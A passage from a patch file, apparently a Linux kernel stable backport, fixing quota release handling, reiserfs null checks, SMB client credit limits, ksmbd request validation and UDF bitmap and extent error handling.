+ 	spin_lock(&dq_list_lock);
+ 	list_for_each_entry(dquot, &inuse_list, dq_inuse) {
+-		if (!test_bit(DQ_ACTIVE_B, &dquot->dq_flags))
++		if (!dquot_active(dquot))
+ 			continue;
+ 		if (dquot->dq_sb != sb)
+ 			continue;
+@@ -612,7 +644,7 @@ int dquot_scan_active(struct super_block *sb,
+ 		 * outstanding call and recheck the DQ_ACTIVE_B after that.
+ 		 */
+ 		wait_on_dquot(dquot);
+-		if (test_bit(DQ_ACTIVE_B, &dquot->dq_flags)) {
++		if (dquot_active(dquot)) {
+ 			ret = fn(dquot, priv);
+ 			if (ret < 0)
+ 				goto out;
+@@ -628,6 +660,18 @@ out:
+ }
+ EXPORT_SYMBOL(dquot_scan_active);
+ 
++static inline int dquot_write_dquot(struct dquot *dquot)
++{
++	int ret = dquot->dq_sb->dq_op->write_dquot(dquot);
++	if (ret < 0) {
++		quota_error(dquot->dq_sb, "Can't write quota structure "
++			    "(error %d). Quota may get out of sync!", ret);
++		/* Clear dirty bit anyway to avoid infinite loop. */
++		clear_dquot_dirty(dquot);
++	}
++	return ret;
++}
++
+ /* Write all dquot structures to quota files */
+ int dquot_writeback_dquots(struct super_block *sb, int type)
+ {
+@@ -651,23 +695,16 @@ int dquot_writeback_dquots(struct super_block *sb, int type)
+ 			dquot = list_first_entry(&dirty, struct dquot,
+ 						 dq_dirty);
+ 
+-			WARN_ON(!test_bit(DQ_ACTIVE_B, &dquot->dq_flags));
++			WARN_ON(!dquot_active(dquot));
+ 
+ 			/* Now we have active dquot from which someone is
+  			 * holding reference so we can safely just increase
+ 			 * use count */
+ 			dqgrab(dquot);
+ 			spin_unlock(&dq_list_lock);
+-			err = sb->dq_op->write_dquot(dquot);
+-			if (err) {
+-				/*
+-				 * Clear dirty bit anyway to avoid infinite
+-				 * loop here.
+-				 */
+-				clear_dquot_dirty(dquot);
+-				if (!ret)
+-					ret = err;
+-			}
++			err = dquot_write_dquot(dquot);
++			if (err && !ret)
++				ret = err;
+ 			dqput(dquot);
+ 			spin_lock(&dq_list_lock);
+ 		}
+@@ -760,13 +797,54 @@ static struct shrinker dqcache_shrinker = {
+ 	.seeks = DEFAULT_SEEKS,
+ };
+ 
++/*
++ * Safely release dquot and put reference to dquot.
++ */
++static void quota_release_workfn(struct work_struct *work)
++{
++	struct dquot *dquot;
++	struct list_head rls_head;
++
++	spin_lock(&dq_list_lock);
++	/* Exchange the list head to avoid livelock. */
++	list_replace_init(&releasing_dquots, &rls_head);
++	spin_unlock(&dq_list_lock);
++
++restart:
++	synchronize_srcu(&dquot_srcu);
++	spin_lock(&dq_list_lock);
++	while (!list_empty(&rls_head)) {
++		dquot = list_first_entry(&rls_head, struct dquot, dq_free);
++		/* Dquot got used again? */
++		if (atomic_read(&dquot->dq_count) > 1) {
++			remove_free_dquot(dquot);
++			atomic_dec(&dquot->dq_count);
++			continue;
++		}
++		if (dquot_dirty(dquot)) {
++			spin_unlock(&dq_list_lock);
++			/* Commit dquot before releasing */
++			dquot_write_dquot(dquot);
++			goto restart;
++		}
++		if (dquot_active(dquot)) {
++			spin_unlock(&dq_list_lock);
++			dquot->dq_sb->dq_op->release_dquot(dquot);
++			goto restart;
++		}
++		/* Dquot is inactive and clean, now move it to free list */
++		remove_free_dquot(dquot);
++		atomic_dec(&dquot->dq_count);
++		put_dquot_last(dquot);
++	}
++	spin_unlock(&dq_list_lock);
++}
++
+ /*
+  * Put reference to dquot
+  */
+ void dqput(struct dquot *dquot)
+ {
+-	int ret;
+-
+ 	if (!dquot)
+ 		return;
+ #ifdef CONFIG_QUOTA_DEBUG
+@@ -778,7 +856,7 @@ void dqput(struct dquot *dquot)
+ 	}
+ #endif
+ 	dqstats_inc(DQST_DROPS);
+-we_slept:
++
+ 	spin_lock(&dq_list_lock);
+ 	if (atomic_read(&dquot->dq_count) > 1) {
+ 		/* We have more than one user... nothing to do */
+@@ -790,35 +868,15 @@ we_slept:
+ 		spin_unlock(&dq_list_lock);
+ 		return;
+ 	}
++
+ 	/* Need to release dquot? */
+-	if (dquot_dirty(dquot)) {
+-		spin_unlock(&dq_list_lock);
+-		/* Commit dquot before releasing */
+-		ret = dquot->dq_sb->dq_op->write_dquot(dquot);
+-		if (ret < 0) {
+-			quota_error(dquot->dq_sb, "Can't write quota structure"
+-				    " (error %d). Quota may get out of sync!",
+-				    ret);
+-			/*
+-			 * We clear dirty bit anyway, so that we avoid
+-			 * infinite loop here
+-			 */
+-			clear_dquot_dirty(dquot);
+-		}
+-		goto we_slept;
+-	}
+-	if (test_bit(DQ_ACTIVE_B, &dquot->dq_flags)) {
+-		spin_unlock(&dq_list_lock);
+-		dquot->dq_sb->dq_op->release_dquot(dquot);
+-		goto we_slept;
+-	}
+-	atomic_dec(&dquot->dq_count);
+ #ifdef CONFIG_QUOTA_DEBUG
+ 	/* sanity check */
+ 	BUG_ON(!list_empty(&dquot->dq_free));
+ #endif
+-	put_dquot_last(dquot);
++	put_releasing_dquots(dquot);
+ 	spin_unlock(&dq_list_lock);
++	queue_delayed_work(system_unbound_wq, &quota_release_work, 1);
+ }
+ EXPORT_SYMBOL(dqput);
+ 
+@@ -908,7 +966,7 @@ we_slept:
+ 	 * already finished or it will be canceled due to dq_count > 1 test */
+ 	wait_on_dquot(dquot);
+ 	/* Read the dquot / allocate space in quota file */
+-	if (!test_bit(DQ_ACTIVE_B, &dquot->dq_flags)) {
++	if (!dquot_active(dquot)) {
+ 		int err;
+ 
+ 		err = sb->dq_op->acquire_dquot(dquot);
+@@ -1425,7 +1483,7 @@ static int info_bdq_free(struct dquot *dquot, qsize_t space)
+ 	return QUOTA_NL_NOWARN;
+ }
+ 
+-static int dquot_active(const struct inode *inode)
++static int inode_quota_active(const struct inode *inode)
+ {
+ 	struct super_block *sb = inode->i_sb;
+ 
+@@ -1448,7 +1506,7 @@ static int __dquot_initialize(struct inode *inode, int type)
+ 	qsize_t rsv;
+ 	int ret = 0;
+ 
+-	if (!dquot_active(inode))
++	if (!inode_quota_active(inode))
+ 		return 0;
+ 
+ 	dquots = i_dquot(inode);
+@@ -1556,7 +1614,7 @@ bool dquot_initialize_needed(struct inode *inode)
+ 	struct dquot **dquots;
+ 	int i;
+ 
+-	if (!dquot_active(inode))
++	if (!inode_quota_active(inode))
+ 		return false;
+ 
+ 	dquots = i_dquot(inode);
+@@ -1667,7 +1725,7 @@ int __dquot_alloc_space(struct inode *inode, qsize_t number, int flags)
+ 	int reserve = flags & DQUOT_SPACE_RESERVE;
+ 	struct dquot **dquots;
+ 
+-	if (!dquot_active(inode)) {
++	if (!inode_quota_active(inode)) {
+ 		if (reserve) {
+ 			spin_lock(&inode->i_lock);
+ 			*inode_reserved_space(inode) += number;
+@@ -1737,7 +1795,7 @@ int dquot_alloc_inode(struct inode *inode)
+ 	struct dquot_warn warn[MAXQUOTAS];
+ 	struct dquot * const *dquots;
+ 
+-	if (!dquot_active(inode))
++	if (!inode_quota_active(inode))
+ 		return 0;
+ 	for (cnt = 0; cnt < MAXQUOTAS; cnt++)
+ 		warn[cnt].w_type = QUOTA_NL_NOWARN;
+@@ -1780,7 +1838,7 @@ int dquot_claim_space_nodirty(struct inode *inode, qsize_t number)
+ 	struct dquot **dquots;
+ 	int cnt, index;
+ 
+-	if (!dquot_active(inode)) {
++	if (!inode_quota_active(inode)) {
+ 		spin_lock(&inode->i_lock);
+ 		*inode_reserved_space(inode) -= number;
+ 		__inode_add_bytes(inode, number);
+@@ -1822,7 +1880,7 @@ void dquot_reclaim_space_nodirty(struct inode *inode, qsize_t number)
+ 	struct dquot **dquots;
+ 	int cnt, index;
+ 
+-	if (!dquot_active(inode)) {
++	if (!inode_quota_active(inode)) {
+ 		spin_lock(&inode->i_lock);
+ 		*inode_reserved_space(inode) += number;
+ 		__inode_sub_bytes(inode, number);
+@@ -1866,7 +1924,7 @@ void __dquot_free_space(struct inode *inode, qsize_t number, int flags)
+ 	struct dquot **dquots;
+ 	int reserve = flags & DQUOT_SPACE_RESERVE, index;
+ 
+-	if (!dquot_active(inode)) {
++	if (!inode_quota_active(inode)) {
+ 		if (reserve) {
+ 			spin_lock(&inode->i_lock);
+ 			*inode_reserved_space(inode) -= number;
+@@ -1921,7 +1979,7 @@ void dquot_free_inode(struct inode *inode)
+ 	struct dquot * const *dquots;
+ 	int index;
+ 
+-	if (!dquot_active(inode))
++	if (!inode_quota_active(inode))
+ 		return;
+ 
+ 	dquots = i_dquot(inode);
+@@ -2093,7 +2151,7 @@ int dquot_transfer(struct user_namespace *mnt_userns, struct inode *inode,
+ 	struct super_block *sb = inode->i_sb;
+ 	int ret;
+ 
+-	if (!dquot_active(inode))
++	if (!inode_quota_active(inode))
+ 		return 0;
+ 
+ 	if (i_uid_needs_update(mnt_userns, iattr, inode)) {
+diff --git a/fs/reiserfs/journal.c b/fs/reiserfs/journal.c
+index 9f62da7471c9e..eb81b4170cb51 100644
+--- a/fs/reiserfs/journal.c
++++ b/fs/reiserfs/journal.c
+@@ -2326,7 +2326,7 @@ static struct buffer_head *reiserfs_breada(struct block_device *dev,
+ 	int i, j;
+ 
+ 	bh = __getblk(dev, block, bufsize);
+-	if (buffer_uptodate(bh))
++	if (!bh || buffer_uptodate(bh))
+ 		return (bh);
+ 
+ 	if (block + BUFNR > max_block) {
+@@ -2336,6 +2336,8 @@ static struct buffer_head *reiserfs_breada(struct block_device *dev,
+ 	j = 1;
+ 	for (i = 1; i < blocks; i++) {
+ 		bh = __getblk(dev, block + i, bufsize);
++		if (!bh)
++			break;
+ 		if (buffer_uptodate(bh)) {
+ 			brelse(bh);
+ 			break;
+diff --git a/fs/smb/client/cifsglob.h b/fs/smb/client/cifsglob.h
+index a37afbb7e399f..4a092cc5a3936 100644
+--- a/fs/smb/client/cifsglob.h
++++ b/fs/smb/client/cifsglob.h
+@@ -970,43 +970,6 @@ release_iface(struct kref *ref)
+ 	kfree(iface);
+ }
+ 
+-/*
+- * compare two interfaces a and b
+- * return 0 if everything matches.
+- * return 1 if a has higher link speed, or rdma capable, or rss capable
+- * return -1 otherwise.
+- */
+-static inline int
+-iface_cmp(struct cifs_server_iface *a, struct cifs_server_iface *b)
+-{
+-	int cmp_ret = 0;
+-
+-	WARN_ON(!a || !b);
+-	if (a->speed == b->speed) {
+-		if (a->rdma_capable == b->rdma_capable) {
+-			if (a->rss_capable == b->rss_capable) {
+-				cmp_ret = memcmp(&a->sockaddr, &b->sockaddr,
+-						 sizeof(a->sockaddr));
+-				if (!cmp_ret)
+-					return 0;
+-				else if (cmp_ret > 0)
+-					return 1;
+-				else
+-					return -1;
+-			} else if (a->rss_capable > b->rss_capable)
+-				return 1;
+-			else
+-				return -1;
+-		} else if (a->rdma_capable > b->rdma_capable)
+-			return 1;
+-		else
+-			return -1;
+-	} else if (a->speed > b->speed)
+-		return 1;
+-	else
+-		return -1;
+-}
+-
+ struct cifs_chan {
+ 	unsigned int in_reconnect : 1; /* if session setup in progress for this channel */
+ 	struct TCP_Server_Info *server;
+diff --git a/fs/smb/client/cifsproto.h b/fs/smb/client/cifsproto.h
+index 98513f5af3f96..a914b88ca51a1 100644
+--- a/fs/smb/client/cifsproto.h
++++ b/fs/smb/client/cifsproto.h
+@@ -85,6 +85,7 @@ extern int cifs_handle_standard(struct TCP_Server_Info *server,
+ 				struct mid_q_entry *mid);
+ extern int smb3_parse_devname(const char *devname, struct smb3_fs_context *ctx);
+ extern int smb3_parse_opt(const char *options, const char *key, char **val);
++extern int cifs_ipaddr_cmp(struct sockaddr *srcaddr, struct sockaddr *rhs);
+ extern bool cifs_match_ipaddr(struct sockaddr *srcaddr, struct sockaddr *rhs);
+ extern int cifs_discard_remaining_data(struct TCP_Server_Info *server);
+ extern int cifs_call_async(struct TCP_Server_Info *server,
+diff --git a/fs/smb/client/connect.c b/fs/smb/client/connect.c
+index cbe08948baf4a..9cd282960c0bb 100644
+--- a/fs/smb/client/connect.c
++++ b/fs/smb/client/connect.c
+@@ -1343,6 +1343,56 @@ next_pdu:
+ 	module_put_and_kthread_exit(0);
+ }
+ 
++int
++cifs_ipaddr_cmp(struct sockaddr *srcaddr, struct sockaddr *rhs)
++{
++	struct sockaddr_in *saddr4 = (struct sockaddr_in *)srcaddr;
++	struct sockaddr_in *vaddr4 = (struct sockaddr_in *)rhs;
++	struct sockaddr_in6 *saddr6 = (struct sockaddr_in6 *)srcaddr;
++	struct sockaddr_in6 *vaddr6 = (struct sockaddr_in6 *)rhs;
++
++	switch (srcaddr->sa_family) {
++	case AF_UNSPEC:
++		switch (rhs->sa_family) {
++		case AF_UNSPEC:
++			return 0;
++		case AF_INET:
++		case AF_INET6:
++			return 1;
++		default:
++			return -1;
++		}
++	case AF_INET: {
++		switch (rhs->sa_family) {
++		case AF_UNSPEC:
++			return -1;
++		case AF_INET:
++			return memcmp(saddr4, vaddr4,
++				      sizeof(struct sockaddr_in));
++		case AF_INET6:
++			return 1;
++		default:
++			return -1;
++		}
++	}
++	case AF_INET6: {
++		switch (rhs->sa_family) {
++		case AF_UNSPEC:
++		case AF_INET:
++			return -1;
++		case AF_INET6:
++			return memcmp(saddr6,
++				      vaddr6,
++				      sizeof(struct sockaddr_in6));
++		default:
++			return -1;
++		}
++	}
++	default:
++		return -1; /* don't expect to be here */
++	}
++}
++
+ /*
+  * Returns true if srcaddr isn't specified and rhs isn't specified, or
+  * if srcaddr is specified and matches the IP address of the rhs argument
+diff --git a/fs/smb/client/smb2ops.c b/fs/smb/client/smb2ops.c
+index e6a191a7499e8..6b020d80bb949 100644
+--- a/fs/smb/client/smb2ops.c
++++ b/fs/smb/client/smb2ops.c
+@@ -34,6 +34,8 @@ static int
+ change_conf(struct TCP_Server_Info *server)
+ {
+ 	server->credits += server->echo_credits + server->oplock_credits;
++	if (server->credits > server->max_credits)
++		server->credits = server->max_credits;
+ 	server->oplock_credits = server->echo_credits = 0;
+ 	switch (server->credits) {
+ 	case 0:
+@@ -511,6 +513,43 @@ smb3_negotiate_rsize(struct cifs_tcon *tcon, struct smb3_fs_context *ctx)
+ 	return rsize;
+ }
+ 
++/*
++ * compare two interfaces a and b
++ * return 0 if everything matches.
++ * return 1 if a is rdma capable, or rss capable, or has higher link speed
++ * return -1 otherwise.
++ */
++static int
++iface_cmp(struct cifs_server_iface *a, struct cifs_server_iface *b)
++{
++	int cmp_ret = 0;
++
++	WARN_ON(!a || !b);
++	if (a->rdma_capable == b->rdma_capable) {
++		if (a->rss_capable == b->rss_capable) {
++			if (a->speed == b->speed) {
++				cmp_ret = cifs_ipaddr_cmp((struct sockaddr *) &a->sockaddr,
++							  (struct sockaddr *) &b->sockaddr);
++				if (!cmp_ret)
++					return 0;
++				else if (cmp_ret > 0)
++					return 1;
++				else
++					return -1;
++			} else if (a->speed > b->speed)
++				return 1;
++			else
++				return -1;
++		} else if (a->rss_capable > b->rss_capable)
++			return 1;
++		else
++			return -1;
++	} else if (a->rdma_capable > b->rdma_capable)
++		return 1;
++	else
++		return -1;
++}
++
+ static int
+ parse_server_interfaces(struct network_interface_info_ioctl_rsp *buf,
+ 			size_t buf_len, struct cifs_ses *ses, bool in_mount)
+diff --git a/fs/smb/client/smb2pdu.c b/fs/smb/client/smb2pdu.c
+index ba46156e32680..ae17d78f6ba17 100644
+--- a/fs/smb/client/smb2pdu.c
++++ b/fs/smb/client/smb2pdu.c
+@@ -1312,7 +1312,12 @@ SMB2_sess_alloc_buffer(struct SMB2_sess_data *sess_data)
+ 	}
+ 
+ 	/* enough to enable echos and oplocks and one max size write */
+-	req->hdr.CreditRequest = cpu_to_le16(130);
++	if (server->credits >= server->max_credits)
++		req->hdr.CreditRequest = cpu_to_le16(0);
++	else
++		req->hdr.CreditRequest = cpu_to_le16(
++			min_t(int, server->max_credits -
++			      server->credits, 130));
+ 
+ 	/* only one of SMB2 signing flags may be set in SMB2 request */
+ 	if (server->sign)
+@@ -1907,7 +1912,12 @@ SMB2_tcon(const unsigned int xid, struct cifs_ses *ses, const char *tree,
+ 	rqst.rq_nvec = 2;
+ 
+ 	/* Need 64 for max size write so ask for more in case not there yet */
+-	req->hdr.CreditRequest = cpu_to_le16(64);
++	if (server->credits >= server->max_credits)
++		req->hdr.CreditRequest = cpu_to_le16(0);
++	else
++		req->hdr.CreditRequest = cpu_to_le16(
++			min_t(int, server->max_credits -
++			      server->credits, 64));
+ 
+ 	rc = cifs_send_recv(xid, ses, server,
+ 			    &rqst, &resp_buftype, flags, &rsp_iov);
+@@ -4291,6 +4301,7 @@ smb2_async_readv(struct cifs_readdata *rdata)
+ 	struct TCP_Server_Info *server;
+ 	struct cifs_tcon *tcon = tlink_tcon(rdata->cfile->tlink);
+ 	unsigned int total_len;
++	int credit_request;
+ 
+ 	cifs_dbg(FYI, "%s: offset=%llu bytes=%u\n",
+ 		 __func__, rdata->offset, rdata->bytes);
+@@ -4322,7 +4333,13 @@ smb2_async_readv(struct cifs_readdata *rdata)
+ 	if (rdata->credits.value > 0) {
+ 		shdr->CreditCharge = cpu_to_le16(DIV_ROUND_UP(rdata->bytes,
+ 						SMB2_MAX_BUFFER_SIZE));
+-		shdr->CreditRequest = cpu_to_le16(le16_to_cpu(shdr->CreditCharge) + 8);
++		credit_request = le16_to_cpu(shdr->CreditCharge) + 8;
++		if (server->credits >= server->max_credits)
++			shdr->CreditRequest = cpu_to_le16(0);
++		else
++			shdr->CreditRequest = cpu_to_le16(
++				min_t(int, server->max_credits -
++						server->credits, credit_request));
+ 
+ 		rc = adjust_credits(server, &rdata->credits, rdata->bytes);
+ 		if (rc)
+@@ -4532,6 +4549,7 @@ smb2_async_writev(struct cifs_writedata *wdata,
+ 	unsigned int total_len;
+ 	struct cifs_io_parms _io_parms;
+ 	struct cifs_io_parms *io_parms = NULL;
++	int credit_request;
+ 
+ 	if (!wdata->server)
+ 		server = wdata->server = cifs_pick_channel(tcon->ses);
+@@ -4649,7 +4667,13 @@ smb2_async_writev(struct cifs_writedata *wdata,
+ 	if (wdata->credits.value > 0) {
+ 		shdr->CreditCharge = cpu_to_le16(DIV_ROUND_UP(wdata->bytes,
+ 						    SMB2_MAX_BUFFER_SIZE));
+-		shdr->CreditRequest = cpu_to_le16(le16_to_cpu(shdr->CreditCharge) + 8);
++		credit_request = le16_to_cpu(shdr->CreditCharge) + 8;
++		if (server->credits >= server->max_credits)
++			shdr->CreditRequest = cpu_to_le16(0);
++		else
++			shdr->CreditRequest = cpu_to_le16(
++				min_t(int, server->max_credits -
++						server->credits, credit_request));
+ 
+ 		rc = adjust_credits(server, &wdata->credits, io_parms->length);
+ 		if (rc)
+diff --git a/fs/smb/server/server.c b/fs/smb/server/server.c
+index 847ee62afb8a1..9804cabe72a84 100644
+--- a/fs/smb/server/server.c
++++ b/fs/smb/server/server.c
+@@ -286,6 +286,7 @@ static void handle_ksmbd_work(struct work_struct *wk)
+ static int queue_ksmbd_work(struct ksmbd_conn *conn)
+ {
+ 	struct ksmbd_work *work;
++	int err;
+ 
+ 	work = ksmbd_alloc_work_struct();
+ 	if (!work) {
+@@ -297,7 +298,11 @@ static int queue_ksmbd_work(struct ksmbd_conn *conn)
+ 	work->request_buf = conn->request_buf;
+ 	conn->request_buf = NULL;
+ 
+-	ksmbd_init_smb_server(work);
++	err = ksmbd_init_smb_server(work);
++	if (err) {
++		ksmbd_free_work_struct(work);
++		return 0;
++	}
+ 
+ 	ksmbd_conn_enqueue_request(work);
+ 	atomic_inc(&conn->r_count);
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+index 9b621fd993bb7..f6fd5cf976a50 100644
+--- a/fs/smb/server/smb2pdu.c
++++ b/fs/smb/server/smb2pdu.c
+@@ -86,9 +86,9 @@ struct channel *lookup_chann_list(struct ksmbd_session *sess, struct ksmbd_conn
+  */
+ int smb2_get_ksmbd_tcon(struct ksmbd_work *work)
+ {
+-	struct smb2_hdr *req_hdr = smb2_get_msg(work->request_buf);
++	struct smb2_hdr *req_hdr = ksmbd_req_buf_next(work);
+ 	unsigned int cmd = le16_to_cpu(req_hdr->Command);
+-	int tree_id;
++	unsigned int tree_id;
+ 
+ 	if (cmd == SMB2_TREE_CONNECT_HE ||
+ 	    cmd ==  SMB2_CANCEL_HE ||
+@@ -113,7 +113,7 @@ int smb2_get_ksmbd_tcon(struct ksmbd_work *work)
+ 			pr_err("The first operation in the compound does not have tcon\n");
+ 			return -EINVAL;
+ 		}
+-		if (work->tcon->id != tree_id) {
++		if (tree_id != UINT_MAX && work->tcon->id != tree_id) {
+ 			pr_err("tree id(%u) is different with id(%u) in first operation\n",
+ 					tree_id, work->tcon->id);
+ 			return -EINVAL;
+@@ -565,9 +565,9 @@ int smb2_allocate_rsp_buf(struct ksmbd_work *work)
+  */
+ int smb2_check_user_session(struct ksmbd_work *work)
+ {
+-	struct smb2_hdr *req_hdr = smb2_get_msg(work->request_buf);
++	struct smb2_hdr *req_hdr = ksmbd_req_buf_next(work);
+ 	struct ksmbd_conn *conn = work->conn;
+-	unsigned int cmd = conn->ops->get_cmd_val(work);
++	unsigned int cmd = le16_to_cpu(req_hdr->Command);
+ 	unsigned long long sess_id;
+ 
+ 	/*
+@@ -593,7 +593,7 @@ int smb2_check_user_session(struct ksmbd_work *work)
+ 			pr_err("The first operation in the compound does not have sess\n");
+ 			return -EINVAL;
+ 		}
+-		if (work->sess->id != sess_id) {
++		if (sess_id != ULLONG_MAX && work->sess->id != sess_id) {
+ 			pr_err("session id(%llu) is different with the first operation(%lld)\n",
+ 					sess_id, work->sess->id);
+ 			return -EINVAL;
+@@ -6314,6 +6314,11 @@ int smb2_read(struct ksmbd_work *work)
+ 	unsigned int max_read_size = conn->vals->max_read_size;
+ 
+ 	WORK_BUFFERS(work, req, rsp);
++	if (work->next_smb2_rcv_hdr_off) {
++		work->send_no_response = 1;
++		err = -EOPNOTSUPP;
++		goto out;
++	}
+ 
+ 	if (test_share_config_flag(work->tcon->share_conf,
+ 				   KSMBD_SHARE_FLAG_PIPE)) {
+@@ -8713,7 +8718,8 @@ int smb3_decrypt_req(struct ksmbd_work *work)
+ 	struct smb2_transform_hdr *tr_hdr = smb2_get_msg(buf);
+ 	int rc = 0;
+ 
+-	if (buf_data_size < sizeof(struct smb2_hdr)) {
++	if (pdu_length < sizeof(struct smb2_transform_hdr) ||
++	    buf_data_size < sizeof(struct smb2_hdr)) {
+ 		pr_err("Transform message is too small (%u)\n",
+ 		       pdu_length);
+ 		return -ECONNABORTED;
+diff --git a/fs/smb/server/smb_common.c b/fs/smb/server/smb_common.c
+index d937e2f45c829..a4421d9458d90 100644
+--- a/fs/smb/server/smb_common.c
++++ b/fs/smb/server/smb_common.c
+@@ -388,26 +388,29 @@ static struct smb_version_cmds smb1_server_cmds[1] = {
+ 	[SMB_COM_NEGOTIATE_EX]	= { .proc = smb1_negotiate, },
+ };
+ 
+-static void init_smb1_server(struct ksmbd_conn *conn)
++static int init_smb1_server(struct ksmbd_conn *conn)
+ {
+ 	conn->ops = &smb1_server_ops;
+ 	conn->cmds = smb1_server_cmds;
+ 	conn->max_cmds = ARRAY_SIZE(smb1_server_cmds);
++	return 0;
+ }
+ 
+-void ksmbd_init_smb_server(struct ksmbd_work *work)
++int ksmbd_init_smb_server(struct ksmbd_work *work)
+ {
+ 	struct ksmbd_conn *conn = work->conn;
+ 	__le32 proto;
+ 
+-	if (conn->need_neg == false)
+-		return;
+-
+ 	proto = *(__le32 *)((struct smb_hdr *)work->request_buf)->Protocol;
++	if (conn->need_neg == false) {
++		if (proto == SMB1_PROTO_NUMBER)
++			return -EINVAL;
++		return 0;
++	}
++
+ 	if (proto == SMB1_PROTO_NUMBER)
+-		init_smb1_server(conn);
+-	else
+-		init_smb3_11_server(conn);
++		return init_smb1_server(conn);
++	return init_smb3_11_server(conn);
+ }
+ 
+ int ksmbd_populate_dot_dotdot_entries(struct ksmbd_work *work, int info_level,
+diff --git a/fs/smb/server/smb_common.h b/fs/smb/server/smb_common.h
+index e63d2a4f466b5..1cbb492cdefec 100644
+--- a/fs/smb/server/smb_common.h
++++ b/fs/smb/server/smb_common.h
+@@ -427,7 +427,7 @@ bool ksmbd_smb_request(struct ksmbd_conn *conn);
+ 
+ int ksmbd_lookup_dialect_by_id(__le16 *cli_dialects, __le16 dialects_count);
+ 
+-void ksmbd_init_smb_server(struct ksmbd_work *work);
++int ksmbd_init_smb_server(struct ksmbd_work *work);
+ 
+ struct ksmbd_kstat;
+ int ksmbd_populate_dot_dotdot_entries(struct ksmbd_work *work,
+diff --git a/fs/udf/balloc.c b/fs/udf/balloc.c
+index 8e597db4d9710..f416b7fe092fc 100644
+--- a/fs/udf/balloc.c
++++ b/fs/udf/balloc.c
+@@ -36,18 +36,41 @@ static int read_block_bitmap(struct super_block *sb,
+ 			     unsigned long bitmap_nr)
+ {
+ 	struct buffer_head *bh = NULL;
+-	int retval = 0;
++	int i;
++	int max_bits, off, count;
+ 	struct kernel_lb_addr loc;
+ 
+ 	loc.logicalBlockNum = bitmap->s_extPosition;
+ 	loc.partitionReferenceNum = UDF_SB(sb)->s_partition;
+ 
+ 	bh = udf_tread(sb, udf_get_lb_pblock(sb, &loc, block));
++	bitmap->s_block_bitmap[bitmap_nr] = bh;
+ 	if (!bh)
+-		retval = -EIO;
++		return -EIO;
+ 
+-	bitmap->s_block_bitmap[bitmap_nr] = bh;
+-	return retval;
++	/* Check consistency of Space Bitmap buffer. */
++	max_bits = sb->s_blocksize * 8;
++	if (!bitmap_nr) {
++		off = sizeof(struct spaceBitmapDesc) << 3;
++		count = min(max_bits - off, bitmap->s_nr_groups);
++	} else {
++		/*
++		 * Rough check if bitmap number is too big to have any bitmap
++		 * blocks reserved.
++		 */
++		if (bitmap_nr >
++		    (bitmap->s_nr_groups >> (sb->s_blocksize_bits + 3)) + 2)
++			return 0;
++		off = 0;
++		count = bitmap->s_nr_groups - bitmap_nr * max_bits +
++				(sizeof(struct spaceBitmapDesc) << 3);
++		count = min(count, max_bits);
++	}
++
++	for (i = 0; i < count; i++)
++		if (udf_test_bit(i + off, bh->b_data))
++			return -EFSCORRUPTED;
++	return 0;
+ }
+ 
+ static int __load_block_bitmap(struct super_block *sb,
+diff --git a/fs/udf/inode.c b/fs/udf/inode.c
+index a4e875b61f895..b574c2a9ce7ba 100644
+--- a/fs/udf/inode.c
++++ b/fs/udf/inode.c
+@@ -57,15 +57,15 @@ static int udf_update_inode(struct inode *, int);
+ static int udf_sync_inode(struct inode *inode);
+ static int udf_alloc_i_data(struct inode *inode, size_t size);
+ static sector_t inode_getblk(struct inode *, sector_t, int *, int *);
+-static int8_t udf_insert_aext(struct inode *, struct extent_position,
+-			      struct kernel_lb_addr, uint32_t);
++static int udf_insert_aext(struct inode *, struct extent_position,
++			   struct kernel_lb_addr, uint32_t);
+ static void udf_split_extents(struct inode *, int *, int, udf_pblk_t,
+ 			      struct kernel_long_ad *, int *);
+ static void udf_prealloc_extents(struct inode *, int, int,
+ 				 struct kernel_long_ad *, int *);
+ static void udf_merge_extents(struct inode *, struct kernel_long_ad *, int *);
+-static void udf_update_extents(struct inode *, struct kernel_long_ad *, int,
+-			       int, struct extent_position *);
++static int udf_update_extents(struct inode *, struct kernel_long_ad *, int,
++			      int, struct extent_position *);
+ static int udf_get_block(struct inode *, sector_t, struct buffer_head *, int);
+ 
+ static void __udf_clear_extent_cache(struct inode *inode)
+@@ -696,7 +696,7 @@ static sector_t inode_getblk(struct inode *inode, sector_t block,
+ 	struct kernel_lb_addr eloc, tmpeloc;
+ 	int c = 1;
+ 	loff_t lbcount = 0, b_off = 0;
+-	udf_pblk_t newblocknum, newblock;
++	udf_pblk_t newblocknum, newblock = 0;
+ 	sector_t offset = 0;
+ 	int8_t etype;
+ 	struct udf_inode_info *iinfo = UDF_I(inode);
+@@ -799,7 +799,6 @@ static sector_t inode_getblk(struct inode *inode, sector_t block,
+ 		ret = udf_do_extend_file(inode, &prev_epos, laarr, hole_len);
+ 		if (ret < 0) {
+ 			*err = ret;
+-			newblock = 0;
+ 			goto out_free;
+ 		}
+ 		c = 0;
+@@ -862,7 +861,6 @@ static sector_t inode_getblk(struct inode *inode, sector_t block,
+ 				goal, err);
+ 		if (!newblocknum) {
+ 			*err = -ENOSPC;
+-			newblock = 0;
+ 			goto out_free;
+ 		}
+ 		if (isBeyondEOF)
+@@ -888,7 +886,9 @@ static sector_t inode_getblk(struct inode *inode, sector_t block,
+ 	/* write back the new extents, inserting new extents if the new number
+ 	 * of extents is greater than the old number, and deleting extents if
+ 	 * the new number of extents is less than the old number */
+-	udf_update_extents(inode, laarr, startnum, endnum, &prev_epos);
++	*err = udf_update_extents(inode, laarr, startnum, endnum, &prev_epos);
++	if (*err < 0)
++		goto out_free;
+ 
+ 	newblock = udf_get_pblock(inode->i_sb, newblocknum,
+ 				iinfo->i_location.partitionReferenceNum, 0);
+@@ -1156,21 +1156,30 @@ static void udf_merge_extents(struct inode *inode, struct kernel_long_ad *laarr,
+ 	}
+ }
+ 
+-static void udf_update_extents(struct inode *inode, struct kernel_long_ad *laarr,
+-			       int startnum, int endnum,
+-			       struct extent_position *epos)
++static int udf_update_extents(struct inode *inode, struct kernel_long_ad *laarr,
++			      int startnum, int endnum,
++			      struct extent_position *epos)
+ {
+ 	int start = 0, i;
+ 	struct kernel_lb_addr tmploc;
+ 	uint32_t tmplen;
++	int err;
+ 
+ 	if (startnum > endnum) {
+ 		for (i = 0; i < (startnum - endnum); i++)
+ 			udf_delete_aext(inode, *epos);
+ 	} else if (startnum < endnum) {
+ 		for (i = 0; i < (endnum - startnum); i++) {
+-			udf_insert_aext(inode, *epos, laarr[i].extLocation,
+-					laarr[i].extLength);
++			err = udf_insert_aext(inode, *epos,
++					      laarr[i].extLocation,
